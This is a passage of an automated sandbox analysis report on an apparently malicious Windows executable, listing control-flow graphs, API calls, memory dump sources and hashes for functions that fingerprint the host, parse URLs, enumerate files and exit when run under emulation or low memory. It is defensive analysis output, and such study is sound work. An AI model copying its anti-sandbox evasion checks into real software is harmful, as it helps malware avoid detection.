call 902a20 2742->2754 2755 918d1f-918d2b call 902930 2742->2755 2758 918ea4-918eb0 call 902930 2743->2758 2759 918e9c-918ea1 call 902a20 2743->2759 2744->2729 2757 918e7f-918e86 2744->2757 2779 918eb3-918eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2729 2754->2755 2755->2779 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2766->2727 2779->2729 2780 918eb7-918eb9 2779->2780 2780->2729 2781 918ebb-918ebd lstrcpy 2780->2781 2781->2729
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: c9b40495230f6cae81528eded9ea1ea939e89644469eb355d7c858014e2af618
                        • Instruction ID: 781748ac2a06ee556c8e1d91a73de74756a7be551348f31b8b9671ee62b13415
                        • Opcode Fuzzy Hash: c9b40495230f6cae81528eded9ea1ea939e89644469eb355d7c858014e2af618
                        • Instruction Fuzzy Hash: 15515E70B047099FC720AF75DD89AAF7AF8AB44704B104C1DE452D7650DFB8E981AF61
                        Function 00922740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2782 922740-922783 GetWindowsDirectoryA 2783 922785 2782->2783 2784 92278c-9227ea GetVolumeInformationA 2782->2784 2783->2784 2785 9227ec-9227f2 2784->2785 2786 9227f4-922807 2785->2786 2787 922809-922820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 922822-922824 2787->2788 2789 922826-922844 wsprintfA 2787->2789 2790 92285b-922872 call 9271e0 2788->2790 2789->2790
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0092277B
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,009193B6,00000000,00000000,00000000,00000000), ref: 009227AC
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0092280F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922816
                        • wsprintfA.USER32 ref: 0092283B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                        • String ID: :\$C
                        • API String ID: 2572753744-3309953409
                        • Opcode ID: 65f6bee859ab3c84874be848bf52fba3b00da98cfd64c29ca42fab4dda7c1aa6
                        • Instruction ID: 0c07c8a8d935b4654e02c4e05310ea52dd952007548dcc9c39e7554f090dd00a
                        • Opcode Fuzzy Hash: 65f6bee859ab3c84874be848bf52fba3b00da98cfd64c29ca42fab4dda7c1aa6
                        • Instruction Fuzzy Hash: 3D3170B1D08219ABCB14CFB89985AEFFFBCEF58710F100169E505F7654E6349B408BA2
                        Function 00904BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2793 904bc0-904bce 2794 904bd0-904bd5 2793->2794 2794->2794 2795 904bd7-904c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 902a20 2794->2795
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00904BF7
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00904C01
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00904C0B
                        • lstrlen.KERNEL32(?,00000000,?), ref: 00904C1F
                        • InternetCrackUrlA.WININET(?,00000000), ref: 00904C27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: 284dc16b56891d549cd5702f856d51bc41d8d257cc093c30b859e7748ba6cdb8
                        • Instruction ID: b9290a1c421e7eba87d7d812946683e4e1d09b5e26af5ad8df7969b44331f00b
                        • Opcode Fuzzy Hash: 284dc16b56891d549cd5702f856d51bc41d8d257cc093c30b859e7748ba6cdb8
                        • Instruction Fuzzy Hash: 1F011B71D00218AFDB10DFA8EC45B9EBBA8AB48320F104526F914E7290EF7459058FD5
                        Function 00901030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2798 901030-901055 GetCurrentProcess VirtualAllocExNuma 2799 901057-901058 ExitProcess 2798->2799 2800 90105e-90107b VirtualAlloc 2798->2800 2801 901082-901088 2800->2801 2802 90107d-901080 2800->2802 2803 9010b1-9010b6 2801->2803 2804 90108a-9010ab VirtualFree 2801->2804 2802->2801 2804->2803
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00901046
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 0090104D
                        • ExitProcess.KERNEL32 ref: 00901058
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0090106C
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 009010AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                        • String ID:
                        • API String ID: 3477276466-0
                        • Opcode ID: 9910f62d5081de005865f0f7cd6eae6bd26463fe6a945a5823afaa7de06d2c2d
                        • Instruction ID: 67d5831372de76def8f2ab18ed6bd88dcb5478e572fc196289b3510c9bfd3e8c
                        • Opcode Fuzzy Hash: 9910f62d5081de005865f0f7cd6eae6bd26463fe6a945a5823afaa7de06d2c2d
                        • Instruction Fuzzy Hash: 0C01F4717403047BE7244A656C5AF6F77ADA784B01F308414F744F72C0DEB1EA008664
                        Function 0091EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2805 91ee90-91eeb5 call 902930 2808 91eeb7-91eebf 2805->2808 2809 91eec9-91eecd call 906c40 2805->2809 2808->2809 2810 91eec1-91eec3 lstrcpy 2808->2810 2812 91eed2-91eee8 StrCmpCA 2809->2812 2810->2809 2813 91ef11-91ef18 call 902a20 2812->2813 2814 91eeea-91ef02 call 902a20 call 902930 2812->2814 2819 91ef20-91ef28 2813->2819 2824 91ef45-91efa0 call 902a20 * 10 2814->2824 2825 91ef04-91ef0c 2814->2825 2819->2819 2821 91ef2a-91ef37 call 902930 2819->2821 2821->2824 2830 91ef39 2821->2830 2825->2824 2828 91ef0e-91ef0f 2825->2828 2829 91ef3e-91ef3f lstrcpy 2828->2829 2829->2824 2830->2829
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EEC3
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0091EEDE
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0091EF3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: ERROR
                        • API String ID: 3722407311-2861137601
                        • Opcode ID: ebed41277b69b01586e7f513189654c1fdd32bb8f33d2277a5a63f356c30c8f8
                        • Instruction ID: f7473b94be140d7926468012c2b03b52f3eb319ce6c46ef44efec3f1c806bdf0
                        • Opcode Fuzzy Hash: ebed41277b69b01586e7f513189654c1fdd32bb8f33d2277a5a63f356c30c8f8
                        • Instruction Fuzzy Hash: 5721073072020A9FCB21FF79DD4AB9E37A8AF50300F145428BC5ADB292DE30E8558B90
                        Function 009010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2886 9010c0-9010cb 2887 9010d0-9010dc 2886->2887 2889 9010de-9010f3 GlobalMemoryStatusEx 2887->2889 2890 901112-901114 ExitProcess 2889->2890 2891 9010f5-901106 2889->2891 2892 901108 2891->2892 2893 90111a-90111d 2891->2893 2892->2890 2894 90110a-901110 2892->2894 2894->2890 2894->2893
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: 8a81a9959e6369d2b5c3818b496ac29e5ca49afc6fdd65067fa118b6733f531e
                        • Instruction ID: b2e00076bc3be7c1520c36bf211b987696d7ed438c60c3c4d54f36934f40fc05
                        • Opcode Fuzzy Hash: 8a81a9959e6369d2b5c3818b496ac29e5ca49afc6fdd65067fa118b6733f531e
                        • Instruction Fuzzy Hash: 19F0A77011C2455FEB5C6A64D84A73DF7ECEB01350F204929EEDAC31D1E670C8409567
                        Function 00918C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2895 918c88-918cc4 StrCmpCA 2897 918cc6-918cc7 ExitProcess 2895->2897 2898 918ccd-918ce6 2895->2898 2900 918ee2-918eef call 902a20 2898->2900 2901 918cec-918cf1 2898->2901 2902 918cf6-918cf9 2901->2902 2904 918ec3-918edc 2902->2904 2905 918cff 2902->2905 2904->2900 2941 918cf3 2904->2941 2907 918d30-918d3f lstrlen 2905->2907 2908 918e56-918e64 StrCmpCA 2905->2908 2909 918d5a-918d69 lstrlen 2905->2909 2910 918dbd-918dcb StrCmpCA 2905->2910 2911 918ddd-918deb StrCmpCA 2905->2911 2912 918dfd-918e0b StrCmpCA 2905->2912 2913 918e1d-918e2b StrCmpCA 2905->2913 2914 918e3d-918e4b StrCmpCA 2905->2914 2915 918d84-918d92 StrCmpCA 2905->2915 2916 918da4-918db8 StrCmpCA 2905->2916 2917 918d06-918d15 lstrlen 2905->2917 2918 918e88-918e9a lstrlen 2905->2918 2919 918e6f-918e7d StrCmpCA 2905->2919 2935 918d41-918d46 call 902a20 2907->2935 2936 918d49-918d55 call 902930 2907->2936 2908->2904 2931 918e66-918e6d 2908->2931 2920 918d73-918d7f call 902930 2909->2920 2921 918d6b-918d70 call 902a20 2909->2921 2910->2904 2924 918dd1-918dd8 2910->2924 2911->2904 2925 918df1-918df8 2911->2925 2912->2904 2926 918e11-918e18 2912->2926 2913->2904 2927 918e31-918e38 2913->2927 2914->2904 2928 918e4d-918e54 2914->2928 2915->2904 2923 918d98-918d9f 2915->2923 2916->2904 2929 918d17-918d1c call 902a20 2917->2929 2930 918d1f-918d2b call 902930 2917->2930 2933 918ea4-918eb0 call 902930 2918->2933 2934 918e9c-918ea1 call 902a20 2918->2934 2919->2904 2932 918e7f-918e86 2919->2932 2954 918eb3-918eb5 2920->2954 2921->2920 2923->2904 2924->2904 2925->2904 2926->2904 2927->2904 2928->2904 2929->2930 2930->2954 2931->2904 2932->2904 2933->2954 2934->2933 2935->2936 2936->2954 2941->2902 2954->2904 2955 918eb7-918eb9 2954->2955 2955->2904 2956 918ebb-918ebd lstrcpy 2955->2956 2956->2904
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: e0c2276ed3d511291375fddeb98901d5680d37629837b351aee34a62de33ddd8
                        • Instruction ID: 6f866e2e3de73d2448d9357cd91445dc4a752b40b04c7ad07d62c360bd0613e8
                        • Opcode Fuzzy Hash: e0c2276ed3d511291375fddeb98901d5680d37629837b351aee34a62de33ddd8
                        • Instruction Fuzzy Hash: 6DE0DFA1200394EBCB009BA8DC88D8BBB2CFF80308B208068F5004B211DB709C05CBAA

                        Non-executed Functions

                        Function 00912390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009123D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009123F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00912402
                        • lstrlen.KERNEL32(\*.*), ref: 0091240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00912436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00912486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 47eb91ab2dcf9fb8bbff49679f20d183b934ad10c4e7307ef91b5648630d9208
                        • Instruction ID: c8f13a533c6be0e6112f08a43f098300a2d7f468dbbb2c842a01e6721dcd22c6
                        • Opcode Fuzzy Hash: 47eb91ab2dcf9fb8bbff49679f20d183b934ad10c4e7307ef91b5648630d9208
                        • Instruction Fuzzy Hash: C0A27D31A1161A9FCB21AF78DD88BEE77B9AF44300F144428F81AE7291DF74DD858B90
                        Function 009016A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009016E2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090176C
                        • lstrcat.KERNEL32(00000000), ref: 00901776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009017A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009017EF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009017F9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901825
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901875
                        • lstrcat.KERNEL32(00000000), ref: 0090187F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009018AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 009018F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009018FE
                        • lstrlen.KERNEL32(00931794), ref: 00901909
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901929
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901935
